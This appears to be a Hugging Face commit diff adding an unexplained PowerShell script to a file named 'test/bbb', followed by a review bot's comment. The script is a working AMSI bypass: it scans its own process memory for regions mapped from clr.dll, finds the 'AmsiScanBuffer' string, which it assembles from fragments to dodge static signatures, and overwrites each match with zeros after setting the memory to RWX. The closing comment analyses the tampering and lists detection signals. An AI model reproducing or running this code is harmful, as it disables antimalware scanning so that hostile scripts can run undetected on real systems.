enotkrutoy commited on
Commit
3e31935
·
verified ·
1 Parent(s): 5932dcc

Update test/bbb

Files changed (1) hide show
  1. test/bbb +162 -1
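--- a/test/bbb
+++ b/test/bbb
@@ -1,3 +1,164 @@
-https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/a
+$PAGE_READONLY = 0x02
+$PAGE_READWRITE = 0x04
+$PAGE_EXECUTE_READWRITE = 0x40
+$PAGE_EXECUTE_READ = 0x20
+$PAGE_GUARD = 0x100
+$MEM_COMMIT = 0x1000
+$MAX_PATH = 260
+
+# Helper functions
+function IsReadable {
+param ($protect, $state)
+return ((($protect -band $PAGE_READONLY) -eq $PAGE_READONLY -or ($protect -band $PAGE_READWRITE) -eq $PAGE_READWRITE -or ($protect -band $PAGE_EXECUTE_READWRITE) -eq $PAGE_EXECUTE_READWRITE -or ($protect -band $PAGE_EXECUTE_READ) -eq $PAGE_EXECUTE_READ) -and ($protect -band $PAGE_GUARD) -ne $PAGE_GUARD -and ($state -band $MEM_COMMIT) -eq $MEM_COMMIT)
+}
+
+function PatternMatch {
+param ($buffer, $pattern, $index)
+for ($i = 0; $i -lt $pattern.Length; $i++) {
+if ($buffer[$index + $i] -ne $pattern[$i]) {
+return $false
+}
+}
+return $true
+}
+
+if ($PSVersionTable.PSVersion.Major -gt 2) {
+
+
+# Create module builder
+$DynAssembly = New-Object System.Reflection.AssemblyName("Win32")
+$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
+$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule("Win32", $False)
+
+# Define structs
+$TypeBuilder = $ModuleBuilder.DefineType("Win32.MEMORY_INFO_BASIC", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType])
+[void]$TypeBuilder.DefineField("BaseAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
+[void]$TypeBuilder.DefineField("AllocationBase", [IntPtr], [System.Reflection.FieldAttributes]::Public)
+[void]$TypeBuilder.DefineField("AllocationProtect", [Int32], [System.Reflection.FieldAttributes]::Public)
+[void]$TypeBuilder.DefineField("RegionSize", [IntPtr], [System.Reflection.FieldAttributes]::Public)
+[void]$TypeBuilder.DefineField("State", [Int32], [System.Reflection.FieldAttributes]::Public)
+[void]$TypeBuilder.DefineField("Protect", [Int32], [System.Reflection.FieldAttributes]::Public)
+[void]$TypeBuilder.DefineField("Type", [Int32], [System.Reflection.FieldAttributes]::Public)
+$MEMORY_INFO_BASIC_STRUCT = $TypeBuilder.CreateType()
+
+# Define structs
+$TypeBuilder = $ModuleBuilder.DefineType("Win32.SYSTEM_INFO", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType])
+[void]$TypeBuilder.DefineField("wProcessorArchitecture", [UInt16], [System.Reflection.FieldAttributes]::Public)
+[void]$TypeBuilder.DefineField("wReserved", [UInt16], [System.Reflection.FieldAttributes]::Public)
+[void]$TypeBuilder.DefineField("dwPageSize", [UInt32], [System.Reflection.FieldAttributes]::Public)
+[void]$TypeBuilder.DefineField("lpMinimumApplicationAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
+[void]$TypeBuilder.DefineField("lpMaximumApplicationAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
+[void]$TypeBuilder.DefineField("dwActiveProcessorMask", [IntPtr], [System.Reflection.FieldAttributes]::Public)
+[void]$TypeBuilder.DefineField("dwNumberOfProcessors", [UInt32], [System.Reflection.FieldAttributes]::Public)
+[void]$TypeBuilder.DefineField("dwProcessorType", [UInt32], [System.Reflection.FieldAttributes]::Public)
+[void]$TypeBuilder.DefineField("dwAllocationGranularity", [UInt32], [System.Reflection.FieldAttributes]::Public)
+[void]$TypeBuilder.DefineField("wProcessorLevel", [UInt16], [System.Reflection.FieldAttributes]::Public)
+[void]$TypeBuilder.DefineField("wProcessorRevision", [UInt16], [System.Reflection.FieldAttributes]::Public)
+$SYSTEM_INFO_STRUCT = $TypeBuilder.CreateType()
+
+# P/Invoke Methods
+$TypeBuilder = $ModuleBuilder.DefineType("Win32.Kernel32", "Public, Class")
+$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
+$SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField("SetLastError")
+$SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, "kernel32.dll", [Reflection.FieldInfo[]]@($SetLastError), @($True))
+
+# Define [Win32.Kernel32]::VirtualProtect
+$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("VirtualProtect", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [bool], [Type[]]@([IntPtr], [IntPtr], [Int32], [Int32].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
+$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
+
+# Define [Win32.Kernel32]::GetCurrentProcess
+$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("GetCurrentProcess", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [IntPtr], [Type[]]@(), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
+$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
+
+# Define [Win32.Kernel32]::VirtualQuery
+$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("VirtualQuery", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [IntPtr], [Type[]]@([IntPtr], [Win32.MEMORY_INFO_BASIC].MakeByRefType(), [uint32]), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
+$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
+
+# Define [Win32.Kernel32]::GetSystemInfo
+$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("GetSystemInfo", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [void], [Type[]]@([Win32.SYSTEM_INFO].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
+$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
+
+# Define [Win32.Kernel32]::GetMappedFileName
+$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("GetMappedFileName", "psapi.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [Int32], [Type[]]@([IntPtr], [IntPtr], [System.Text.StringBuilder], [uint32]), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
+$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
+
+# Define [Win32.Kernel32]::ReadProcessMemory
+$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("ReadProcessMemory", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [Int32], [Type[]]@([IntPtr], [IntPtr], [byte[]], [int], [int].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
+$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
+
+# Define [Win32.Kernel32]::WriteProcessMemory
+$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("WriteProcessMemory", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [Int32], [Type[]]@([IntPtr], [IntPtr], [byte[]], [int], [int].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
+$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
+
+$Kernel32 = $TypeBuilder.CreateType()
+
+$a = "Ams"
+$b = "iSc"
+$c = "anBuf"
+$d = "fer"
+$signature = [System.Text.Encoding]::UTF8.GetBytes($a + $b + $c + $d)
+$hProcess = [Win32.Kernel32]::GetCurrentProcess()
+
+# Get system information
+$sysInfo = New-Object Win32.SYSTEM_INFO
+[void][Win32.Kernel32]::GetSystemInfo([ref]$sysInfo)
+
+# List of memory regions to scan
+$memoryRegions = @()
+$address = [IntPtr]::Zero
+
+# Scan through memory regions
+while ($address.ToInt64() -lt $sysInfo.lpMaximumApplicationAddress.ToInt64()) {
+$memInfo = New-Object Win32.MEMORY_INFO_BASIC
+if ([Win32.Kernel32]::VirtualQuery($address, [ref]$memInfo, [System.Runtime.InteropServices.Marshal]::SizeOf($memInfo))) {
+$memoryRegions += $memInfo
+}
+# Move to the next memory region
+$address = New-Object IntPtr($memInfo.BaseAddress.ToInt64() + $memInfo.RegionSize.ToInt64())
+}
+
+$count = 0
+
+# Loop through memory regions
+foreach ($region in $memoryRegions) {
+# Check if the region is readable and writable
+if (-not (IsReadable $region.Protect $region.State)) {
+continue
+}
+# Check if the region contains a mapped file
+$pathBuilder = New-Object System.Text.StringBuilder $MAX_PATH
+if ([Win32.Kernel32]::GetMappedFileName($hProcess, $region.BaseAddress, $pathBuilder, $MAX_PATH) -gt 0) {
+$path = $pathBuilder.ToString()
+if ($path.EndsWith("clr.dll", [StringComparison]::InvariantCultureIgnoreCase)) {
+# Scan the region for the pattern
+$buffer = New-Object byte[] $region.RegionSize.ToInt64()
+$bytesRead = 0
+[void][Win32.Kernel32]::ReadProcessMemory($hProcess, $region.BaseAddress, $buffer, $buffer.Length, [ref]$bytesRead)
+for ($k = 0; $k -lt ($bytesRead - $signature.Length); $k++) {
+$found = $True
+for ($m = 0; $m -lt $signature.Length; $m++) {
+if ($buffer[$k + $m] -ne $signature[$m]) {
+$found = $False
+break
+}
+}
+if ($found) {
+$oldProtect = 0
+if (($region.Protect -band $PAGE_READWRITE) -ne $PAGE_READWRITE) {
+[void][Win32.Kernel32]::VirtualProtect($region.BaseAddress, $buffer.Length, $PAGE_EXECUTE_READWRITE, [ref]$oldProtect)
+}
+$replacement = New-Object byte[] $signature.Length
+$bytesWritten = 0
+[void][Win32.Kernel32]::WriteProcessMemory($hProcess, [IntPtr]::Add($region.BaseAddress, $k), $replacement, $replacement.Length, [ref]$bytesWritten)
+$count++
+if (($region.Protect -band $PAGE_READWRITE) -ne $PAGE_READWRITE) {
+[void][Win32.Kernel32]::VirtualProtect($region.BaseAddress, $buffer.Length, $region.Protect, [ref]$oldProtect)
+}
+}
+}
+}
+}
+}
+}
 $n::$m($s, $i, $d, $l)
 $count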
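Review bot: Neither the file nor the commit message ("Update test/bbb") says what this script is for, and new lines 95–99 build the search pattern from four string fragments, which keeps the literal name `AmsiScanBuffer` out of the source and appears intended to defeat static string matching. Because new lines 132–155 look for that name only in regions mapped from `clr.dll` and overwrite each match with zero bytes through `WriteProcessMemory` after a `VirtualProtect` to `PAGE_EXECUTE_READWRITE`, the change tampers with a security control in the current process; if the repository keeps it as detection test material it should say so in a header, e.g. `# TEST FIXTURE: in-process AMSI tampering sample for detection validation; isolated lab hosts only`. On the detection side, the Reflection.Emit P/Invoke definitions of `VirtualProtect` and `WriteProcessMemory`, together with `GetMappedFileName` and the `clr.dll` suffix check, are all visible to PowerShell script block logging, and a protection change to RWX on an image-backed region is a usable memory-integrity signal. The two context lines that follow (`$n::$m($s, $i, $d, $l)` and `$count`) use variables defined outside this hunk, so what runs after the patch cannot be judged from here.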